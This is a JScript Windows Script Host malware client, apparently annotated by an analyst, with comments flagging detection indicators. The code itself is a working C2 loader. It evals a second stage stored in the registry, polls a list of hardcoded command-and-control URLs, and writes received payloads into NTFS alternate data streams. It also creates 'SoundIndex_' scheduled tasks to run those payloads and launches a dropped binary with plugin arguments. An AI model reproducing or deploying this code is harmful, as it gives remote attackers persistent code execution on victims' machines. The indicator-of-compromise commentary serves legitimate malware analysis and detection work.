// Static configuration for the C2 client in this script. Of these fields only
// COMMAND_C2, C2_OB_KEY and C2_COMMAND_PREFIX are referenced in the visible code;
// the rest are presumably consumed by the library loaded in Client.LibraryLoadContext.
var client_config = {
// Candidate C2 base URLs, tried in order by Client.GetTask (plain http, no TLS).
// Several entries resemble legitimate CDN/vendor hostnames, so the request path
// pattern built in GetWorkerEndpoint is a more reliable indicator than host names alone.
COMMAND_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
SOFT_SIG : 'mad24',                            // not referenced in this listing
CLIENT_ID : 'E669F102FDFB9C8F2E538C0A8CA3CC29', // not referenced in this listing
C2_REQUEST_SLEEP : 20,                         // not referenced in this listing
C2_FAIL_SLEEP : 1,                             // not referenced in this listing
C2_FAIL_COUNT : 3,                             // not referenced in this listing
C2_OB_KEY : 'JxTRG4mY',                        // static key material mixed into DeriveKey() in GetWorkerEndpoint and GetTask
SOFT_VERSION : 30,                             // not referenced in this listing
C2_COMMAND_PREFIX : 'api.aspx',                // path appended to every C2 base URL
C2_USE_IEXPLORE : false                        // not referenced in this listing
}
var CLIENT_IMPORT_ENV = true; // not referenced elsewhere in this listing
var Client = {};              // namespace object that the functions below hang off
// WScript.Shell COM object; used in LoadLibraryReg for registry reads. Creation of this
// object from a script host is a common hunting signal in WSH-based loaders.
Client.CoMainObject = new ActiveXObject('WScript.Shell');
// Reads the second-stage script body from a per-user registry value.
// The value is passed straight to eval() in LibraryLoadContext, so this key is
// where the real library code persists; collect it during triage of an affected host.
Client.LoadLibraryReg = function(){
return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
}
// Executes the registry-stored library with eval() and binds the globals it defines
// onto Client. None of Windows, GlobalStrings, DataTools, ObjectProducer, Http,
// Loader or debug are defined in this listing, so they must come from the eval'd
// code; every call into them below is therefore opaque from this file alone.
Client.LibraryLoadContext = function(){
eval(Client.LoadLibraryReg());
Client.Windows = Windows;
Client.GlobalStrings = GlobalStrings;
Client.DataTools = DataTools;
Client.ObjectProducer = ObjectProducer;
Client.Http = Http;
Client.Loader = Loader;
Client.debug = debug;
}
// Builds the path-and-query used for one C2 poll (no host; GetTask prefixes a base URL).
// DataTools.* and Loader.GetUid come from the eval'd library, so their exact behaviour
// is assumed from their names here.
Client.GetWorkerEndpoint = function(){
var nonce = Client.DataTools.Random.String(12); // per-request random value; also sent in clear as g=
var uid = Client.Loader.GetUid();               // client identifier (origin not visible in this listing)
var sessionKey = nonce + client_config.C2_OB_KEY;
var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0); // presumably an obfuscating transform keyed from sessionKey
encodedId = Base64Encode(encodedId); // note Base64Encode strips "//" from its output, which can alter the value
encodedId = encodeURIComponent(encodedId);
// Resulting shape: api.aspx?dx11diag=<encoded uid>&remote=<41 random chars>&g=<nonce>&cdn=281
// The fixed parameter names and the constant cdn=281 are a stable detection handle for proxy logs.
return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&remote=" + Client.DataTools.Random.String(41) + "&g=" + nonce + "&cdn=281";
}
// Registers a scheduled task (through the TASK_CREATE template) that runs the WMIC_EXEC
// template against <NTFILE_PATH>:<taskName>. The file:stream form of that path, together
// with WriteDataStreamBytes in GetTask, indicates an NTFS alternate data stream is used
// to hold the payload. Both templates live in the eval'd library and are not visible here.
Client.PrepareExectionTask = function(taskName){
var currentTime = new Date(),
hours = currentTime.getHours(),
minutes = currentTime.getMinutes();
hours = hours < 10 ? "0" + hours.toString() : hours;
// The comparison uses minutes + 3 while the assigned value uses minutes + 1, and there is
// no hour rollover, so the HH:MM string is not always a valid clock time.
minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
var time = hours + ":" + minutes; // intended start time roughly one minute ahead
var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
// Task names always carry the "SoundIndex_" prefix -- a useful indicator when auditing scheduled tasks.
var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))
Client.Windows.Execute(taskCommand);
}
// Runs a binary dropped at %temp%\<uid>.bin (via the WMIC_EXEC_ARGS template), passing
// pluginId as its argument. How that file gets there is not shown in this listing.
Client.ExecutePlugin = function(pluginId){
var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));
Client.Windows.Execute(command);
}
// Polls each C2 base URL in order and stops at the first response that carries a task
// or plugin marker. Responses are de-obfuscated with RotString keyed by
// DeriveKey(uid + C2_OB_KEY). There is no error handling: what happens when a host is
// unreachable depends entirely on the hidden Http.Request helper.
Client.GetTask = function(){
for(var i = 0; i < client_config.COMMAND_C2.length; i++){
var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint())); // <base>/<GetWorkerEndpoint()>
response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));
if(response.indexOf("--TASK") !== -1){
// Given the indices used, the layout is presumably --TASK--<taskName>--<base64 payload>.
var executionTask = response.replace('--TASK--', '').split('--')[1];
var taskName = response.split('--')[2];
// The scheduled task is created before the payload it runs is written.
Client.PrepareExectionTask(taskName);
// Decoded payload is stored as alternate data stream <taskName> of NTFILE_PATH.
Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
return;
}
if(response.indexOf('--PLUGIN') !== -1){
// --PLUGIN--<id>: the remainder is handed to the %temp%\<uid>.bin binary as its argument.
var plugin = response.replace('--PLUGIN--', '');
Client.ExecutePlugin(plugin);
return;
}
}
}
// Decodes a base64 string into an open ADODB.Stream of raw bytes using the classic
// MSXML "bin.base64" element trick. The stream is returned still open and positioned
// after the written data; the caller (WriteDataStreamBytes, not visible) is expected
// to rewind or persist it.
function Base64bytes(string){
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.text = string;
var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1; // adTypeBinary
stream.Open();
stream.Write(element.nodeTypedValue);
return stream;
}
// Converts a JScript string to a binary byte array by writing it as ASCII text into an
// ADODB.Stream and re-reading the stream in binary mode. The stream is never closed.
function StringToBinary(string){
var BinaryStream = new ActiveXObject("ADODB.Stream");
BinaryStream.Type = 2;          // adTypeText
BinaryStream.CharSet = "ascii"; // non-ASCII input would be lost here
BinaryStream.Open();
BinaryStream.WriteText(string);
BinaryStream.Position = 0;
BinaryStream.Type = 1;          // switch to adTypeBinary before reading back
BinaryStream.Position = 0;
return BinaryStream.Read();
}
// Base64-encodes a string via MSXML's "bin.base64" element. Newlines inserted by MSXML
// are removed; every "//" sequence is also removed, which silently changes the encoded
// value and makes the output not generally decodable by a standard base64 decoder.
function Base64Encode(string) {
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.nodeTypedValue = StringToBinary(string);
return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Entry point: load the registry-stored library, wait one minute, then poll the C2 once.
Client.LibraryLoadContext();
WScript.Sleep(1 * 60 * 1000); // 60 s pause before the first network request
Client.GetTask();             // a single poll per run of this script